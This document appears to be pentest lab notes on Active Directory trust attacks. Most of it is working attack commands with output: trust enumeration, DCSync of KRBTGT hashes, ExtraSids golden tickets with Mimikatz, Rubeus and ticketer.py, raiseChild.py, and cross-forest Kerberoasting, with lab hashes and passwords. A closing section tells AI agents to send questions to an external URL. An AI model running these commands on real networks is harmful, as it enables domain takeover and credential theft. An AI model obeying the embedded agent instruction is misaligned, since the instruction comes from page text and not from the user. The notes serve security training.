# Trust Attacks

### Enumeration

```powershell
Import-Module activedirectory
Get-ADTrust -Filter *
```

```powershell
Import-Module .\Powerview.ps1
Get-DomainTrust
Get-DomainTrustMapping
```

#### Checking Users in the Child Domain using Get-DomainUser

```powershell
Get-DomainUser -Domain LOGISTICS.INLANEFREIGHT.LOCAL | select SamAccountName
```

#### Using netdom to query domain trust

```powershell
netdom query /domain:inlanefreight.local trust
```

#### Using netdom to query domain controllers

```powershell
netdom query /domain:inlanefreight.local dc
```

#### Using netdom to query workstations and servers

```powershell
netdom query /domain:inlanefreight.local workstation
```

### Attacking Domain Trust Child - Parent Trust from Windows

#### SID History Primer

The [sidHistory](https://learn.microsoft.com/en-us/windows/win32/adschema/a-sidhistory) attribute is used in migration scenarios. If a user in one domain is migrated to another domain, a new account is created in the second domain. The original user's SID will be added to the new user's SID history attribute, ensuring that the user can still access resources in the original domain.\
SID history is intended to work across domains, but can work in the same domain. Using Mimikatz, an attacker can perform SID history injection and add an administrator account to the SID History attribute of an account they control. When logging in with this account, all of the SIDs associated with the account are added to the user's token.

This token is used to determine what resources the account can access. If the SID of a Domain Admin account is added to the SID History attribute of this account, then this account will be able to perform DCSync and create a Golden Ticket or a Kerberos ticket- granting ticket (TGT), which will allow for us to authenticate as any account in the domain of our choosing for further persistence.

* <https://www.thehacker.recipes/ad/persistence/sid-history>

#### Extra SID - Mimikatz

This attack allows for the compromise of a parent domain once the child domain has been compromised.

* The KRBTGT hash for the child domain
* The SID for the child domain
* The name of a target user in the child domain (does not need to exist!)
* The FQDN of the child domain.
* The SID of the Enterprise Admins group of the root domain.
* With this data collected, the attack can be performed with Mimikatz

**Obtaining the KRBTGT Account's NT Hash using Mimikatz**

```powershell
PS C:\htb> mimikatz # lsadump::dcsync /user:LOGISTICS\krbtgt
```

**Get-DomainSID**\
We can use the PowerView Get-DomainSID function to get the SID for the child domain, but this is also visible in the Mimikatz output above

```powershell
PS C:\htb> Import Powerview.ps1
PS C:\htb> Get-DomainSID
S-1-5-21-2806153819-209893948-922872689
```

\*\*Obtaining Enterprise Admins Group's SID using Get-DomainGroup

```powershell
# using activedirectory module
Get-ADGroup -Identity "Enterprise Admins" -Server "INLANEFREIGHT.LOCAL"
# using powerview
Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid
```

* The KRBTGT hash for the child domain: `9d765b482771505cbe97411065964d5f`
* The SID for the child domain: `S-1-5-21-2806153819-209893948-922872689`
* The name of a target user in the child domain (does not need to exist to create our Golden Ticket!): We'll choose a fake user: `hacker`
* The FQDN of the child domain: `LOGISTICS.INLANEFREIGHT.LOCAL`
* The SID of the Enterprise Admins group of the root domain: S-1-5-21-3842939050-3880317879-2865463114-519

**Creating Golden Ticket with Mimikatz**

```powershell
PS C:\htb> mimikatz.exe 
mimikatz # kerberos::golden /user:hacker /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948- 922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21- 3842939050-3880317879-2865463114-519 /ptt
```

**Confirming a Kerberos Ticket is in Memory Using klist**

```powershell
PS C:\htb> klist
```

#### Extra-Sid Attack - Rubeus

```powershell
PS C:\htb> .\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948- 922872689 /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt
```

#### Performing a DCSync Attack

```powershell
PS C:\Tools> .\mimikatz.exe
mimikatz # lsadump::dcsync /user:INLANEFREIGHT\lab_adm


mimikatz # lsadump::dcsync /user:INLANEFREIGHT\lab_adm /domain:INLANEFREIGHT.LOCA
```

### Attacking Domain Trust Child - Parent Trust from Linux

We'll still need to gather the same bits of information

* This attack allows for the compromise of a parent domain once the child domain has been compromised.
* The KRBTGT hash for the child domain
* The SID for the child domain
* The name of a target user in the child domain (does not need to exist!)
* The FQDN of the child domain.
* The SID of the Enterprise Admins group of the root domain.

#### Performing DCSync using secretsdump.py in Child

```bash
secretsdump.py logistics.inlanefreight.local/[email protected] -just-dc- user LOGISTICS/krbtgt 

Impacket v0.9.25.dev1+20220311.121550.1271d369 - Copyright 2021 SecureAuth Corporation 
Password: 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) 
[*] Using the DRSUAPI method to get NTDS.DIT secrets krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9d765b482771505cbe97411065964d 5f::: 
[*] Kerberos keys grabbed 
krbtgt:aes256-cts-hmac-sha1- 96:d9a2d6659c2a182bc93913bbfa90ecbead94d49dad64d23996724390cb833fb8 
krbtgt:aes128-cts-hmac-sha1-96:ca289e175c372cebd18083983f88c03e 
krbtgt:des-cbc-md5:fee04c3d026d7538 
[*] Cleaning up..

```

#### Performing SID Burte Forcing using lookupsid.py

```bash
lookupsid.py logistics.inlanefreight.local/[email protected]
Password: [*] Brute forcing SIDs at 172.16.5.240 
[*] StringBinding ncacn_np:172.16.5.240[\pipe\lsarpc] 
[*] Domain SID is: S-1-5-21-2806153819-209893948-922872689
```

#### Looking for the Domain SID

```bash
lookupsid.py logistics.inlanefreight.local/[email protected] | grep "Domain SID"
Password: [*] 
Domain SID is: S-1-5-21-2806153819-209893948-92287268
```

#### Grabbing the Domain SID & Attaching to Enterprise Admin's RID

```bash
lookupsid.py logistics.inlanefreight.local/[email protected] | grep -B12 "Enterprise Admins"
Password: 
[*] Domain SID is: S-1-5-21-3842939050-3880317879-2865463114 
498: INLANEFREIGHT\Enterprise Read-only Domain Controllers (SidTypeGroup) 
500: INLANEFREIGHT\administrator (SidTypeUser)
501: INLANEFREIGHT\guest (SidTypeUser) 
502: INLANEFREIGHT\krbtgt (SidTypeUser) 
512: INLANEFREIGHT\Domain Admins (SidTypeGroup) 
513: INLANEFREIGHT\Domain Users (SidTypeGroup) 
514: INLANEFREIGHT\Domain Guests (SidTypeGroup) 
515: INLANEFREIGHT\Domain Computers (SidTypeGroup) 
516: INLANEFREIGHT\Domain Controllers (SidTypeGroup) 
517: INLANEFREIGHT\Cert Publishers (SidTypeAlias) 
518: INLANEFREIGHT\Schema Admins (SidTypeGroup) 
519: INLANEFREIGHT\Enterprise Admins (SidTypeGroup)
```

* The KRBTGT hash for the child domain: 9d765b482771505cbe97411065964d5f
* The SID for the child domain: S-1-5-21-2806153819-209893948-922872689
* The name of a target user in the child domain (does not need to exist!): hacker
* The FQDN of the child domain: LOGISTICS.INLANEFREIGHT.LOCAL
* The SID of the Enterprise Admins group of the root domain: S-1-5-21-3842939050- 3880317879-2865463114-519

#### Constructing a Golden Ticket using ticketer.py

```bash
ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948- 922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker
...
[*] Saving ticket in hacker.ccache]
```

```bash
export KRB5CCNAME=hacker.ccache

psexec.py LOGISTICS.INLANEFREIGHT.LOCAL/[email protected] -k -no-pass - target-ip 172.16.5.5
```

#### Performing the Attack with raiseChild.py

```
raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm
```

### Attacking Domain Trusts - Cross-Forest Trust Abuse - from Windows

#### Cross-Forest Kerberoasting

**Enumerating Accounts for Associated SPNs Using Get-DomainUser**

```powershell
Get-DomainUser -SPN -Domain FREIGHTLOGISTICS.LOCAL | select SamAccountName
samaccountname 
-------------- 
krbtgt 
mssqlsvc
```

**Enumerating the mssqlsvc Account**

```powershell
PS C:\htb> Get-DomainUser -Domain FREIGHTLOGISTICS.LOCAL -Identity mssqlsvc |select samaccountname,memberof

samaccountname memberof 
-------------- -------- 
mssqlsvc CN=Domain Admins,CN=Users,DC=FREIGHTLOGISTICS,DC=LOCAL

```

**Performing a Kerberoasting Attacking with Rubeus Using /domain Flag**

```powershell
PS C:\htb> .\Rubeus.exe kerberoast /domain:FREIGHTLOGISTICS.LOCAL /user:mssqlsvc /nowrap
[*] Total kerberoastable users : 1 
[*] SamAccountName : mssqlsvc 
[*] DistinguishedName : CN=mssqlsvc,CN=Users,DC=FREIGHTLOGISTICS,DC=LOCAL 
[*] ServicePrincipalName : MSSQLsvc/sql01.freightlogstics:1433 
[*] PwdLastSet : 3/24/2022 12:47:52 PM 
[*] Supported ETypes : RC4_HMAC_DEFAULT 
[*] Hash : $krb5tgs$23$*mssqlsvc$FREIGHTLOGISTICS.LOCAL$MSSQLsvc/sql01.freightlogstic s: *$<SNIP>
```

#### Admin Password Re-Use & Group Membership

From time to time, we'll run into a situation where there is a bidirectional forest trust managed by admins from the same company.

```powershell
Get-DomainForeignGroupMember -Domain FREIGHTLOGISTICS.LOCAL 
GroupDomain : FREIGHTLOGISTICS.LOCAL 
GroupName : Administrators 
GroupDistinguishedName : CN=Administrators,CN=Builtin,DC=FREIGHTLOGISTICS,DC=LOCAL 
MemberDomain : FREIGHTLOGISTICS.LOCAL 
MemberName : S-1-5-21-3842939050-3880317879-2865463114-500 
MemberDistinguishedName : CN=S-1-5-21-3842939050-3880317879-2865463114- 500,CN=ForeignSecurityPrincipals,DC=FREIGHTLOGIS TICS,DC=LOCAL 

PS C:\htb> Convert-SidToName S-1-5-21-3842939050-3880317879-2865463114-500 INLANEFREIGHT\administrator 

```

```powershell
PS C:\htb> Enter-PSSession -ComputerName ACADEMY-EA- DC03.FREIGHTLOGISTICS.LOCAL -Credential -Credential INLANEFREIGHT\administrator

PS C:\Users\administrator.INLANEFREIGHT\Documents> whoami 
inlanefreight\administrator

PS C:\Users\administrator.INLANEFREIGHT\Documents> ipconfig /all


Host Name . . . . . . . . . . . . : ACADEMY-EA-DC03 
Primary Dns Suffix . . . . . . . : FREIGHTLOGISTICS.LOCAL 
Node Type . . . . . . . . . . . . : Hybrid 
IP Routing Enabled. . . . . . . . : No 
WINS Proxy Enabled. . . . . . . . : No 
DNS Suffix Search List. . . . . . : FREIGHTLOGISTICS.LOCA
```

### Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux

#### Cross-Forest Kerberoasting

```bash
GetUserSPNs.py -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley
```

```bash
GetUserSPNs.py -request -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley
```

**Hunting Foreign Group Membership with Bloodhound-python**

* First domain

```bash
cat /etc/resolv.conf
# run "resolvectl status" to see details about the actual nameservers. 
#nameserver 1.1.1.1 
#nameserver 8.8.8.8 
domain INLANEFREIGHT.LOCAL 
nameserver 172.16.5.5
```

```bash
bloodhound-python -d INLANEFREIGHT.LOCAL -dc ACADEMY-EA-DC01 -c All -u forend -p Klmcargo2
```

* Second domain

```bash
cat /etc/resolv.conf 
# Dynamic resolv.conf(5) file for glibc resolver(3) generated by resolvconf(8) 
# DO NOT EDIT THIS FILE BY HAND -- YOUR CHANGES WILL BE OVERWRITTEN 
# 127.0.0.53 is the systemd-resolved stub resolver. 
# run "resolvectl status" to see details about the actual nameservers. 
#nameserver 1.1.1.1 
#nameserver 8.8.8.8 
domain FREIGHTLOGISTICS.LOCAL 
nameserver 172.16.5.238
```

```bash
bloodhound-python -d FREIGHTLOGISTICS.LOCAL -dc ACADEMY-EA- DC03.FREIGHTLOGISTICS.LOCAL -c All -u [email protected] -p Klmcargo
```

Upload both data (first and second domain) to bloodhound and select:

* `Users with Foreign Domain Group Membership`


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://notes.dado1513.dev/active-directory/trust-attacks.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.